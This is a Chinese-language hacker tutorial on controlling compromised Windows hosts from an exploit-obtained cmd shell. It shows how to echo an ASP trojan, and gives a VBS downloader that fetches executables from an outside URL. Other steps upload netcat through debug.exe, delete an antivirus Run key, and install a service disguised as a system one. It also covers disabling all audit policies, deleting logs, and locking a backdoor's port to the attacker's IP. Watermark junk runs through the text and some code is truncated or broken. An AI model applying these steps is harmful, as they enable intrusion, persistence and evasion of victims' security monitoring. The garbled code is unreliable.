命令行交互

韩冰

目录
1，前言
3 {9 e$ L+ M+ t2，文件传输
3，系统配置
1 Z2 a$ c; ^7 i( u' c! x4，网络配置
; J5 n3 K) E. A. l# _7 b8 @5，软件安装
! j6 |$ ~5 e. E+ I1 ~) X) y6，Windows脚本
2 O: ~8 d$ F8 X7，附言
! @6 W9 t# O8 H4 r( {0 W! m

! f, {' `0 C4 A2 z前言
0 u0 j( B7 P5 ?+ OCmd Shell(命令行交互)是黑客永恒的话题，它历史悠久并且长盛不衰。本文旨在介绍和总结一些在命令行下控制Windows系统的方法。这些方法都是尽可能地利用系统自带的工具实现的。
3 R- k" s8 B& I7 S1 b% x  E- ^: b
7 N0 U* q: H: Q
# |# i* ?% u; I- Z0 \文件传输
对于溢出漏洞获得的cmd shell，最大的问题就是如何上传文件。由于蠕虫病毒流行，连接ipc$所需要的139或445端口被路由封锁。再加上WinXP系统加强了对ipc$的保护，通过ipc$及默认共享上传文件的手段基本无效了。ftp和tftp是两种可行的方法，介于其已被大家熟知，本文就不介绍了。还有三种大家熟悉的办法，作为总结我再提一下：

' d( T& a+ m9 T, v3 \% w1，用Echo命令写ASP木马。
/ K4 n2 z$ {4 `3 V- J前提当然是目标主机上已经安装了IIS。
: D" D6 b  _4 z一般的ASP木马“体积”较大，不适合直接用echo命令写入文件，这里我提供一个小巧的。
6 G/ R( X* A# `; m" A3 p直接给出echo版：

% z: M- T! t3 q@echo ^ >up.asp
* T* n) O* A/ G7 ~
注意，只有一行，中间没有回车符。
  D% R& T* f, U2 ^6 o! ?生成的up.asp不能用浏览器访问，只能用下面这个脚本：

+ F4 A, j# F  w( G6 r" d3 ^& @with wscript
. y/ E6 M( T% b+ Y$ \$ {9 xif .arguments.count>dl.vbs
@echo w.open "get",.arguments(0),0:w.send:if w.status^>200 then .echo "Error:"+w.status:.quit>>dl.vbs
: D. n; \1 C( Z/ B. |# G- P* u@echo aso.type=1:aso.open:aso.write w.responsebody:aso.savetofile .arguments(1),2:end with >>dl.vbs

5 p# c8 l$ B& T# n2 F  Z+ y( ~举例——下载ps.exe并保存到c:\path下：
) F1 g, \; w: ^' H
0 c- ?! {* i, [6 {( Rcscript dl.vbs http://www.sometips.com/soft/ps.exe c:\path\ps.exe

3 p! R* _6 T6 w2 y/ E1 c' @注意，这是在远程shell中执行的。

9 h; M4 ?+ q' E9 Q: B5 R4，Echo经过编码的任何文件，再用脚本+debug还原。
前面两个办法都不能保证穿过防火墙。而且，除非自己架Web服务器，一般的Web资源都是以压缩文件的形式提供。如果目标主机没有解压工具，还是没辙。那么只有出“杀手锏”了！
& [% @7 V6 P& Z- Y7 U! K1 h/ x/ c
echo命令加重定向x作符可以写入ASCII码小于128的字符，但大于等于128的不行。只有将本地文件重新“编码”为可显示的字符，才能方便地写入远程主机。首先能想到的就是base64编码，即email附件的编码方式。但vbs不支持位x作，因此编码和解码较复杂。更麻烦的是，脚本以二进制流方式处理文件的能力很差。（ADODB.Stream可以以流方式写文件，但我无法构造出相应的数据类型。二进制数据流可以用midb函数转成字符串，但反过来不行。我花了两天时间，还是没能解决这个问题。如果有谁能用vbs或js写任意的字节数据到文件中，恳请赐教。）
6 z! L' B0 {; ]# w7 w- W& y% l
无奈只有请debug.exe出马了。原理很多人都知道，我不介绍了，直接给出成果——编码脚本：

, \& e1 r* i( ?1 v' Q; J/ c7 [fp=wscript.arguments(0)
) H3 a* ^. N1 |6 e; q" ^fn=right(fp,len(fp)-instrrev(fp,"\"))
with createobject("adodb.stream")
.type=1:.open:.loadfromfile fp:str=.read:sl=lenb(str)
end with
sll=sl mod 65536:slh=sl\65536
with createobject("scripting.filesystemobject").opentextfile(fp&".bat",2,true)
.write "@echo str="""
for i=1 to sl
/ \8 Y2 b' q5 o  |1 {5 b$ Ebt=ascb(midb(str,i,1))
if bt>debug.vbs"+vbcrlf+"@echo +"""
next
4 O3 i# X! g( B.writeline """>>debug.vbs"+vbcrlf+"@echo with wscript.stdout:r=vbcrlf"_
+":for i=1 to len(str) step 48:.write ""e""+hex(256+(i-1)/2)"_
+":for j=i to i+46 step 2:.write "" ""+mid(str,j,2):next:.write r:next>>debug.vbs"
. K7 {  O1 d. A4 n6 b" ~.writeline "@echo .write ""rbx""+r+"""+hex(slh)+"""+r+""rcx""+r+"""+hex(sll)_
+"""+r+""n debug.tmp""+r+""w""+r+""q""+r:end with"_
+">>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp """&fn&"""&del debug.vbs"
end with
  \' O/ S' h! @! B
将其保存为echo.vbs。假设要上传nc.exe，那么在本地命令行输入命令：

, y1 L5 N5 c- w  ]0 x/ n( S8 icscript echo.vbs nc.exe

也可以直接把要传输的文件的图标拖放到脚本文件的图标上。
稍等一会儿，在当前目录下将生成一个nc.exe.bat。用记事本等编辑工具打开它，可以看到如下内容：
- v, ~% p& v8 O4 A; z4 J
2 b! ~7 \5 r: d@echo str="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"_>>debug.vbs
; i, V, ~% ]% A+ ?4 r4 A@echo +"504500004C010400B98EAE340000000000000000E0000F010B010500009800000062000000000000004C00000010000000B0000000004000001000000002000004000000000000000400000000000000003001000004000000000000030000000000100000100000000010000010000000000000100000000000000000000000"_>>debug.vbs
@echo +"002001003C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0210100640100000000000000000000000000000000000000000000000000002E74657874000000"_>>debug.vbs
# G; X* o; C  n6 ^) n@echo +"70970000001000000098000000040000000000000000000000000000200000602E726461746100001704000000B0000000060000009C0000000000000000000000000000400000402E646174610000004452000000C00000003E000000A20000000000000000000000000000400000C02E696461746100005C07000000200100"_>>debug.vbs
9 n/ y) O; m1 O$ }…………
) X' L6 C5 Z# ~+ R  r$ V7 d…………（省略若干行）
) D% l  w7 t3 a, \0 i7 Q: W3 V, f…………
@echo +"">>debug.vbs
9 w9 Y3 a5 W6 _@echo with wscript.stdout:r=vbcrlf:for i=1 to len(str) step 48:.write "e"+hex(256+(i-1)/2):for j=i to i+46 step 2:.write " "+mid(str,j,2):next:.write r:next>>debug.vbs
@echo .write "rbx"+r+"0"+r+"rcx"+r+"E800"+r+"n debug.tmp"+r+"w"+r+"q"+r:end with>>debug.vbs&&cscript //nologo debug.vbs|debug.exe>nul&&ren debug.tmp "NC.EXE"&del debug.vbs
  F- h0 a- u7 S% y2 }0 i
全选 －》 复制 －》 切换到远程命令行窗口 －》 粘贴。
- M+ K1 p  j9 j+ C& W! H如果网速不是很慢的话，整个上传过程大约需要20秒。

几点说明：
; [8 x' ?9 q4 J! m0 p1，大的文件传输不稳定，可能会使shell死掉。所以文件越小效果越好。建议原文件不要超过100KB。
2，在传输大文件前，可以先传个小的文件作为“热身”，让16位虚拟机ntvdm.exe驻留后台。所有文件传完后，为隐蔽起见，应该把ntvdm进程杀掉。
3，某些cmd shell每个命令都需要附加两个回车，那nc.exe.bat就不能直接用了。
4，单个命令的长度是有限的，所以不能只用一个echo完成全部任务。而且，对于nc提供的cmd shell，稍长一些的命令竟然会使shell自动退出（溢出了？）。你可以修改"i mod 128=0"语句中的128以调整每个echo命令的长度。每次echo的字符为这个数乘以2。
( y  h6 ?( a2 k/ z0 q9 ?0 X5，解码过程没有脚本参与也是可以的。使用脚本的目的是减少传输的数据量（因为压缩了数据）。如果有时间，我会写一个更完善的脚本，加强数据压缩能力，增加数据校验功能。

能上传文件当然一切都好办了，但很多x作用Windows自带的工具更方便。在你到处寻找需要的工具时，不要忘了Windows本身。

韩冰

系统配置
$ K# D/ h; @  \2 l/ o0 G这节包括三方面内容：注册表、服务和组策略。
, _( O: F+ O! J* {& {7 z2 m
) _7 o8 G: V5 A9 V* r; z( S( k先说注册表。很多命令行下访问注册表的工具都是交互式的，溢出产生的shell一般不能再次重定向输入/输出流，所以无法使用。
' }6 j( Y# N) y1 L% k% B9 u% c好在系统自带的regedit.exe足够用了。

* m6 O! g  ^# {3 m) |, O1，读取注册表
8 T, H; d/ T( E" w: H3 ^% G先将想查询的注册表项导出，再用type查看，比如：
/ J5 r- \: j& c' _2 f& t: x3 T% X
C:\>regedit /e 1.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
% R) b) n9 n- Y: v  n2 u3 k
C:\>type 1.reg | find "ortNumber"
2 E- _" ?. S5 Q"ortNumber"=dword:00000d3d

C:\>del 1.reg

所以终端服务的端口是3389（十六进制d3d）
: o0 Q- P6 |" c* F+ t5 v
2，修改/删除注册表项
2 {. z) M7 o! F  J. {先echo一个reg文件，然后导入，比如：
7 s2 H7 f- h% Q. I' n# l
echo Windows Registry Editor Version 5.00 >1.reg
echo. >>1.reg
. |% d; U: f' x& ]( E3 p- mecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0] >>1.reg
: a+ x: |: a% I3 I  kecho "TelnetPort"=dword:00000913 >>1.reg
echo "NTLM"=dword:00000001 >>1.reg
echo. >>1.reg
regedit /s 1.reg

" N0 c7 l. B, c7 ~- i将telnet服务端口改为2323（十六进制913），NTLM认证方式为1。
% }4 J  }; a8 n; ~( ?
要删除一个项，在名字前面加减号，比如：
) n8 ]% W" H+ @4 K3 U  B
/ S% i% M: d' y3 W7 N! Y[-HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Serv-U]
( t% A$ q( r+ p, L1 a# A
* r9 n/ X3 ?$ Y* X/ E2 [1 y要删除一个值，在等号后面用减号，比如：
7 M5 x2 m$ p3 Z) |1 E/ j! C0 H
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KAVRun"=-
% Q$ y" J1 y' h8 h# l1 q7 X
3，用inf文件访问注册表
; F3 B4 ~& |' y上面对注册表的三个x作，也可以用下面这个inf文件来实现：
* Y' c8 z: c; J: y3 {) t! o# @
[Version]
Signature="$WINDOWS NT$"
; [9 J, c& c, B2 L( J/ |- a) D* M[DefaultInstall]
# O7 x! ^' d4 wAddReg=My_AddReg_Name
DelReg=My_DelReg_Name
[My_AddReg_Name]
* g) t8 |) N% G9 i6 PHKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,2323
8 H. n+ Z. k; [HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
$ o4 J) E8 b3 L1 f, H! r/ O& v[My_DelReg_Name]
9 @) b# F; Y% y7 E! |0 z2 AHKLM,SYSTEM\CurrentControlSet\Services\Serv-U
HKLM,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,KAVRun
+ ?. v' `5 I/ w" x, Q
# M+ n5 l7 B$ f将它写入c:\path\reg.inf然后用下面这个命令“安装”：
, N" U2 h" P9 s, ^0 S
' A& E  j& h  f, b% R+ U6 yrundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\reg.inf
" {! S# V' i: h0 p) k4 ]
0 m; Z' M+ g7 T' s( o, A3 @7 P+ l几点说明：
1，[Version]和[DefaultInstall]是必须的，AddReg和DelReg至少要有一个。My_AddReg_Name和My_DelReg_Name可以自定义。
0x00010001表示REG_DWORD数据类型，0x00000000或省略该项(保留逗号)表示REG_SZ(字符串)。0x00020000表示REG_EXPAND_SZ。
2323也可以用0x913代替。
" v5 M/ L; G* n& h: I. |0 z3 ^: p/ `关于inf文件的详细信息，可以参考DDK帮助文档。
2，InstallHinfSection是大小写敏感的。它和setupapi之间只有一个逗号，没有空格。
128表示给定路径，该参数其他取值及含义参见MSDN。
特别注意，最后一个参数，必须是inf文件的全路径，不要用相对路径。
3，inf文件中的项目都是大小写不敏感的。
. l; `. v- D% Z4 {  g) b8 G8 W& x- Z+ Y

8 q2 x/ S6 ~; f# g接下来说服务。如果想启动或停止服务，用net命令就可以。但想增加或删除服务，需要用SC，instsrv.exe，xnet.exe等工具。而这些工具系统没有自带（XP和2003自带SC)。导入注册表虽然可以，但效果不好，原因后面会提到。还是得靠inf文件出马。

增加一个服务：
' G3 F8 i- `6 e
# |, Y( B2 y, z2 Z9 X. M[Version]
Signature="$WINDOWS NT$"
, ]) \2 p# C& L% {) f# r[DefaultInstall.Services]
- A! L* C8 X" ~' m6 x$ D7 v3 U) zAddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
( _* |+ t" }0 E+ b, cDisplayName=Windows Internet Service
Description=提供对 Internet 信息服务管理的支持。
2 p2 Q6 S! x, Z2 B, Z3 h5 J2 |ServiceType=0x10
" Y7 a& {: h1 A! p+ dStartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
5 w1 m3 V4 z2 M# e# n- V) p! z
保存为inetsvr.inf，然后：

2 c* l$ H; y, v- N8 ~, F. Xrundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf
. U7 J' i* x  N" E" \3 s/ `3 f: u
& o/ T6 u6 }5 z这个例子增加一个名为inetsvr的服务（是不是很像系统自带的服务，呵呵）。

7 F4 V# m$ S% q8 H) q/ Z/ ?$ y几点说明：
' d: V3 R4 F; ^  _8 F2 ^0 o1，最后四项分别是
服务类型：0x10为独立进程服务，0x20为共享进程服务（比如svchost）；
, ~9 n" I6 [# l启动类型：0 系统引导时加载，1 OS初始化时加载，2 由SCM（服务控制管理器）自动启动，3 手动启动，4 禁用。
（注意，0和1只能用于驱动程序）
错误控制：0 忽略，1 继续并警告，2 切换到LastKnownGood的设置，3 蓝屏。
服务程序位置：%11%表示system32目录，%10%表示系统目录(WINNT或Windows)，%12%为驱动目录system32\drivers。其他取值参见DDK。你也可以不用变量，直接使用全路径。
这四项是必须要有的。
4 u) V# R/ P0 ^/ X& ?5 ?2，除例子中的六个项目，还有LoadOrderGroup、Dependencies等。不常用所以不介绍了。
; W+ ?) I9 B3 ?, N# q0 o) O, V3，inetsvr后面有两个逗号，因为中间省略了一个不常用的参数flags。
1 \  |, @$ f4 F2 v+ U5 J
9 d# Y$ z0 T7 R3 }$ A$ O- a6 e删除一个服务：

2 [3 j* Q6 Q" ?: Z) t0 G[Version]
Signature="$WINDOWS NT$"
[DefaultInstall.Services]
+ _: z/ a; @% _* a3 EDelService=inetsvr
, w: U2 o9 Y0 f& G* Q4 k; w. r' `
" {& ]; o$ i+ O: J很简单，不是吗？
9 y4 H' b! V1 S/ O: u3 ?
. q. }' D* `2 s当然，你也可以通过导入注册表达到目的。但inf自有其优势。
% D# C5 Z5 W* B( l7 T: c) c% p1，导出一个系统自带服务的注册表项，你会发现其执行路径是这样的：
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,\
00,6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00
: N# P/ @. S  M8 U* ?( s: q0 p" r可读性太差。其实它就是%SystemRoot%\system32\tlntsvr.exe，但数据类型是REG_EXPAND_SZ。当手动导入注册表以增加服务时，这样定义ImagePath显然很不方便。如果用REG_SZ代替会有些问题——不能用环境变量了。即只能使用完整路径。用inf文件完全没有这个问题，ServiceBinary（即ImagePath）自动成为REG_EXPAND_SZ。
2，最关键的是，和用SC等工具一样，inf文件的效果是即时起效的，而导入reg后必须重启才有效。
3，inf文件会自动为服务的注册表项添加一个Security子键，使它看起来更像系统自带的服务。

韩冰

另外，AddService和DelService以及AddReg、DelReg可以同时且重复使用。即可以同时增加和删除多个服务和注册表项。详细的内容还是请查看DDK。
0 Q' @, l. [& c

, ^4 i  l4 @" q0 [& Q6 \! e) n最后说说组策略。组策略是建立Windows安全环境的重要手段，尤其是在Windows域环境下。一个出色的系统管理员，应该能熟练地掌握并应用组策略。在窗口界面下访问组策略用gpedit.msc，命令行下用secedit.exe。
& f' h. x% w" B
先看secedit命令语法：
  {" {6 g* n6 m0 \7 Q  ~7 Zsecedit /analyze
5 W2 r% ~6 i, w8 V9 x7 ~. V: ssecedit /configure
) w. o8 G# s, f" F7 G1 Hsecedit /export
, v9 }2 d2 r, c$ rsecedit /validate
8 j3 C& K/ ^+ D% {secedit /refreshpolicy
5个命令的功能分别是分析组策略、配置组策略、导出组策略、验证模板语法和更新组策略。其中secedit /refreshpolicy 在XP/2003下被gpupdate代替。这些命令具体的语法自己在命令行下查看就知道了。

与访问注册表只需reg文件不同的是，访问组策略除了要有个模板文件(还是inf)，还需要一个安全数据库文件(sdb)。要修改组策略，必须先将模板导入安全数据库，再通过应用安全数据库来刷新组策略。来看个例子：
0 P, H, X- G7 B8 T
假设我要将密码长度最小值设置为6，并启用“密码必须符合复杂性要求”，那么先写这么一个模板：

- V) z: s& F& E# J2 U[version]
signature="$CHICAGO$"
) G$ }8 X. l8 Z+ k2 f[System Access]
MinimumPasswordLength = 6
) A* Q% |7 A; o2 B6 j: BPasswordComplexity = 1
" S* x6 D0 f' x6 Q9 k
, i) h9 e* E* G, s5 A  s% p  ?2 @保存为gp.inf，然后导入：
5 S4 P* @3 X9 `* S6 H
secedit /configure /db gp.sdb /cfg gp.inf /quiet
. z" o7 D4 T& T2 A/ P
2 t3 A) `7 Z. w1 g4 l' C这个命令执行完成后，将在当前目录产生一个gp.sdb，它是“中间产品”，你可以删除它。
/quiet参数表示“安静模式”，不产生日志。但根据我的试验，在2000sp4下该参数似乎不起作用，XP下正常。日志总是保存在%windir%\security\logs\scesrv.log。你也可以自己指定日志以便随后删除它。比如：
0 m0 S* B+ }# _
! k% w: V( m2 I6 y! y0 @6 ^secedit /configure /db gp.sdb /cfg gp.inf /log gp.log
7 e4 d3 F$ x# m) ~* I. M4 vdel gp.*
" N9 ^* q  l: z& c% @$ V4 O  N
+ q, U0 u4 [+ r另外，在导入模板前，还可以先分析语法是否正确：
. A9 M/ R) Y' _1 v
. M0 L% t: U* @( k# x9 l' ?+ psecedit /validate gp.inf
6 c1 a' Y6 @! _0 J+ \& C% Q
那么，如何知道具体的语法呢？当然到MSDN里找啦。也有偷懒的办法，因为系统自带了一些安全模板，在%windir%\security\templates目录下。打开这些模板，基本上包含了常用的安全设置语法，一看就懂。
0 n6 e" O$ D+ H: }- k' N
* N& b% R  J% t7 ]再举个例子——关闭所有的“审核策略”。（它所审核的事件将记录在事件查看器的“安全性”里）。
echo版：
/ y2 X+ a+ X6 W) A1 e- A
echo [version] >1.inf
! d' a; S0 N* l2 ?echo signature="$CHICAGO$" >>1.inf
echo [Event Audit] >>1.inf
+ \! t& e+ C2 {6 |# kecho AuditSystemEvents=0 >>1.inf
echo AuditObjectAccess=0 >>1.inf
echo AuditPrivilegeUse=0 >>1.inf
" K3 J9 E4 W  d  u; \6 W, r' iecho AuditPolicyChange=0 >>1.inf
8 K. }3 A& W5 [1 i$ L2 G1 wecho AuditAccountManage=0 >>1.inf
  v" I* W6 c' d& b4 o5 L) I+ D. aecho AuditProcessTracking=0 >>1.inf
echo AuditDSAccess=0 >>1.inf
echo AuditAccountLogon=0 >>1.inf
: q9 U' C6 F, Yecho AuditLogonEvents=0 >>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
- t) d: [: W1 b0 X( Ydel 1.*
8 @0 L: k) Z2 W; K4 W% [6 R( @/ [
2 _& t: Z4 |! y/ |也许有人会说：组策略不是保存在注册表中吗，为什么不直接修改注册表？因为不是所有的组策略都保存在注册表中。比如“审核策略”就不是。你可以用regsnap比较修改该策略前后注册表的变化。我测试的结果是什么都没有改变。只有“管理模板”这一部分是完全基于注册表的。而且，知道了具体位置，用哪个方法都不复杂。
: _5 p* M7 e( e  h$ I! o5 h( q+ I
比如，XP和2003的“本地策略”－》“安全选项”增加了一个“本地帐户的共享和安全模式”策略。XP下默认的设置是“仅来宾”。这就是为什么用管理员帐号连接XP的ipc$仍然只有Guest权限的原因。可以通过导入reg文件修改它为“经典”：

echo Windows Registry Editor Version 5.00 >1.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>1.reg
echo "forceguest"=dword:00000000 >>1.reg
regedit /s 1.reg
del 1.reg
; |. f6 y# B# h. T- v! h3 A9 T( q. j% r
7 v/ W3 X% e5 R) N而相应的用inf，应该是：
) E9 ^7 X% K2 O. C, r  w6 z
& y% d6 H1 `2 c, Q4 ^echo [version] >1.inf
9 A3 [/ o0 q2 fecho signature="$CHICAGO$" >>1.inf
6 K, U& {, i' {5 c9 L* P/ n( Uecho [Registry Values] >>1.inf
0 c3 n  `% G. h6 Lecho MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0 >>1.inf
" s' `5 S" ~; h! Y3 ?+ bsecedit /configure /db 1.sdb /cfg 1.inf /log 1.log
) X3 s" i0 H7 y; R* Q6 e$ ddel 1.*
0 R  ]$ P9 V9 t! y4 j
关于命令行下读取组策略的问题。
; ^. G! j" y, p0 i系统默认的安全数据库位于%windir%\security\database\secedit.sdb，将它导出至inf文件：

secedit /export /cfg gp.inf /log 1.log
% U4 P) \$ L( h. j; F
* D* t( h8 g: M/ D' i7 n/ V没有用/db参数指定数据库就是采用默认的。然后查看gp.inf。

* [: b- E5 f4 Z7 F8 ?9 I. R不过，这样得到的只是组策略的一部分（即“Windows设置”）。而且，某个策略如果未配置，是不会被导出的。比如“重命名系统管理员帐户”，只有被定义了才会在inf文件中出现NewAdministratorName="xxx"。对于无法导出的其他的组策略只有通过访问注册表来获得了。
6 E% i) Z- x# _0 C# D7 c
6 \& p1 z+ P3 v3 E* B6 h- g, h此办法在XP和2003下无效——可以导出但内容基本是空的。原因不明。根据官方的资料，XP和2003显示组策略用RSoP（组策略结果集）。相应的命令行工具是gpresult。但是，它获得的是在系统启动时被附加（来自域）的组策略，单机测试结果还是“空”。所以，如果想知道某些组策略是否被设置，只有先写一个inf，再用secedit /analyze，然后查看日志了。
, G3 H3 q9 L  d7 S* ~% y* v
, s- M0 R8 R7 W% R
. \7 ^4 |) d3 n- L, Y网络配置
1 u% `$ \2 J3 ?Windows自带的关于网络的命令行工具很多，比如大家熟悉的ping,tracert,ipconfig,telnet,ftp,tftp,netstat，还有不太熟悉的nbtstat,pathping,nslookup,finger,route,netsh……
这些命令又可分成三类：网络检测（如ping）、网络连接（如telnet）和网络配置（如netsh）。前面两种相对简单，本文只介绍两个网络配置工具。

netsh
在远程shell中使用netsh首先要解决一个交互方式的问题。前面说过，很多shell不能再次重定向输出输出，所以不能在这种环境下交互地使用ftp等命令行工具。解决的办法是，一般交互式的工具都允许使用脚本（或者叫应答文件）。比如ftp -s:filename。netsh也是这样：netsh -f filename。

韩冰

netsh命令的功能非常多，可以配置IAS、DHCP、RAS、WINS、NAT服务器，TCP/IP协议，IPX协议，路由等。我们不是管理员，一般没必要了解这么多，只需用netsh来了解目标主机的网络配置信息。
# N( P, X8 p5 J. R0 z
1 A- w' Z  o+ U* ^, J3 r" p1，TCP/IP配置
, Q' p8 u' z5 |+ [/ U6 V  K
0 M# k' u+ d% L% S/ P6 N8 Fecho interface ip >s
echo show config >>s
' ^2 [: d9 Q9 b" Fnetsh -f s
' O' g  V# C6 Zdel s
4 u; g+ N" N: h  w
由此你可以了解该主机有多个网卡和IP，是否是动态分配IP(DHCP)，内网IP是多少（如果有的话）。
这个命令和ipconfig /all差不多。

注意，以下命令需要目标主机启动remoteaccess服务。如果它被禁用，请先通过导入注册表解禁，然后
net start remoteaccess
' k! V9 P5 `" @8 e: y  M& t4 C/ ^
; b' I. `/ a1 k/ r2，ARP
1 U* s6 n; d1 M" @
' O+ @% K( V1 c5 o8 j- techo interface ip >s
: w# I: R8 u8 C. _echo show ipnet >>s
netsh -f s
. l( v1 Q2 U. U0 ~6 Kdel s
) y  \  I% H- c1 u9 D
这个比arp -a命令多一点信息。
4 `+ p+ p7 M8 J6 O
, |8 |/ R) N. J: p- @, ~3，TCP/UDP连接

4 j9 v. Q- |% x( G3 Secho interface ip >s
( _, x  k, R. E: W3 ^) E. {$ decho show tcpconn >>s
echo show udpconn >>s
0 `8 u+ J% j% y) a6 ]1 e4 R# enetsh -f s
del s
: s% W! c% Z; q2 |  l
这组命令和netstat -an一样。

# ^/ |' s6 I6 d- p4，网卡信息
如果netsh命令都有其他命令可代替，那它还有什么存在的必要呢？下面这个就找不到代替的了。

echo interface ip >s
9 n5 M( g9 W1 Mecho show interface >>s
3 |7 A( F+ b4 {7 B- Fnetsh -f s
del s
$ q& {1 j5 a7 F% n/ F: L2 lnetsh的其他功能，比如修改IP，一般没有必要使用（万一改了IP后连不上，就“叫天不应叫地不灵”了），所以全部略过。
& q+ L$ u3 m9 i: P* v
) a8 ]. T2 S" ?7 A' _1 U) oIPSec
首先需要指出的是，IPSec和TCP/IP筛选是不同的东西，大家不要混淆了。TCP/IP筛选的功能十分有限，远不如IPSec灵活和强大。下面就说说如何在命令行下控制IPSec。
6 Q7 T0 T- @3 c8 h0 A, x( P* ^6 H
XP系统用ipseccmd，2000下用ipsecpol。遗憾的是，它们都不是系统自带的。ipseccmd在xp系统安装盘的SUPPORT\TOOLS\SUPPORT.CAB中，ipsecpol在2000 Resource Kit里。而且，要使用ipsecpol还必须带上另外两个文件：ipsecutil.dll和text2pol.dll。三个文件一共119KB。
; `5 D  H1 h% X3 Z: e+ u
IPSec可以通过组策略来控制，但我找遍MSDN，也没有找到相应的安全模板的语法。已经配置好的IPSec策略也不能被导出为模板。所以，组策略这条路走不通。IPSec的设置保存在注册表中(HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local)，理论上可以通过修改注册表来配置IPSec。但很多信息以二进制形式存放，读取和修改都很困难。相比之下，上传命令行工具更方便。

关于ipsecpol和ipseccmd的资料，网上可以找到很多，因此本文就不细说了，只是列举一些实用的例子。
4 Z/ N) f% d( n! J7 l在设置IPSec策略方面，ipseccmd命令的语法和ipsecpol几乎完全一样，所以只以ipsecpol为例：
) a/ t0 a  v: y
4 q/ d7 x  t1 {: d5 Y; u2 I1，防御rpc-dcom攻击
3 P/ Y9 I; c- S9 N& d
- S3 N% S5 q8 U+ p8 Q) hipsecpol -p myfirewall -r rpc-dcom -f *+0:135:tcp *+0:135:udp *+0:137:udp *+0:138:udp *+0:139:tcp *+0:445:tcp *+0:445:udp -n BLOCK -w reg -x
7 t. I/ _' Z% S! b4 `) r) k
& P. S  _2 T( |1 L2 Z  l$ [& ~+ F这条命令关闭了本地主机的TCP135,139,445和udp135,137,138,445端口。
具体含义如下：
: Y0 ~" h* V1 U-p myfirewall 指定策略名为myfirewall
- ^5 k( i3 C& I( \! x3 V! Y2 q-r rpc-dcom 指定规则名为rpc-dcom
-f …… 建立7个筛选器。*表示任何地址(源)；0表示本机地址(目标)；+表示镜像(双向)筛选。详细语法见ipsecpol -?
4 J% l( h6 O" P' _1 w5 f-n BLOCK 指定筛选x作是“阻塞”。注意，BLOCK必须是大写。
+ a0 G) a+ \6 R3 C-w reg 将配置写入注册表，重启后仍有效。
-x 立刻激活该策略。
- j9 Q- i% G& R! Y
2，防止被ping

ipsecpol -p myfirewall -r antiping -f *+0::icmp -n BLOCK -w reg -x
$ Y; p+ [7 v. u! w: c4 Z: v
如果名为myfirewall的策略已存在，则antiping规则将添加至其中。
注意，该规则同时也阻止了该主机ping别人。

3，对后门进行IP限制
9 c0 _) l& C' b假设你在某主机上安装了DameWare Mini Remote Control。为了保护它不被别人暴破密码或溢出，应该限制对其服务端口6129的访问。

ipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.89+0:6129:tcp -n PASS -w reg -x
+ k9 p8 u/ Z0 @5 U$ x% @
  S7 k9 z% t/ N& A$ T这样就只有123.45.67.89可以访问该主机的6129端口了。
如果你是动态IP，应该根据IP分配的范围设置规则。比如：
5 L( J8 n" g% k, }
3 ]( P. k% m. W5 N: d+ gipsecpol -p myfw -r dwmrc_block_all -f *+0:6129:tcp -n BLOCK -w reg
  ~0 |# f: D9 {/ N( Y# ?ipsecpol -p myfw -r dwmrc_pass_me -f 123.45.67.*+0:6129:tcp -n PASS -w reg -x
% C/ i* r, B7 U0 W1 y, W8 T
7 w" {) S0 L0 F# G这样就允许123.45.67.1至123.45.67.254的IP访问6129端口。

$ L( `: D% k7 V3 Y, }在写规则的时候，应该特别小心，不要把自己也阻塞了。如果你不确定某个规则的效果是否和预想的一样，可以先用计划任务“留下后路”。例如：

! r; y# ?9 h4 _) Q2 p) @1 M. {/ rc:\>net start schedule
Task Scheduler 服务正在启动 ..
Task Scheduler 服务已经启动成功。
5 d5 q& R" B! E$ B. J& O( j5 h
; i$ I! B7 R2 }: R2 t/ {c:\>time /t
9 Y" Y5 {' q& c/ g/ ^& v' g12:34
: B: W" m! s. T. w- R6 p
c:\>at 12:39 ipsecpol -p myfw -y -w reg
( k# y4 h( w: n" R3 w新加了一项作业，其作业 ID = 1
. E1 ~. z0 q* r' q* _, N2 R
然后，你有5分钟时间设置一个myfw策略并测试它。5分钟后计划任务将停止该策略。
如果测试结果不理想，就删除该策略。

c:\>ipsecpol -p myfw -o -w reg
. t6 b3 D. {3 d5 W! }* H
8 I5 @* x0 M. D; c4 f4 C注意，删除策略前必须先确保它已停止。不停止它的话，即使删除也会在一段时间内继续生效。持续时间取决于策略的刷新时间，默认是180分钟。
3 S, c1 Z( Z2 H0 g
( v- I5 u; q5 a1 C如果测试通过，那么就启用它。
+ R! T, v0 Q. |- \8 d& v; j7 O, d
c:\>ipsecpol -p myfw -x -w reg

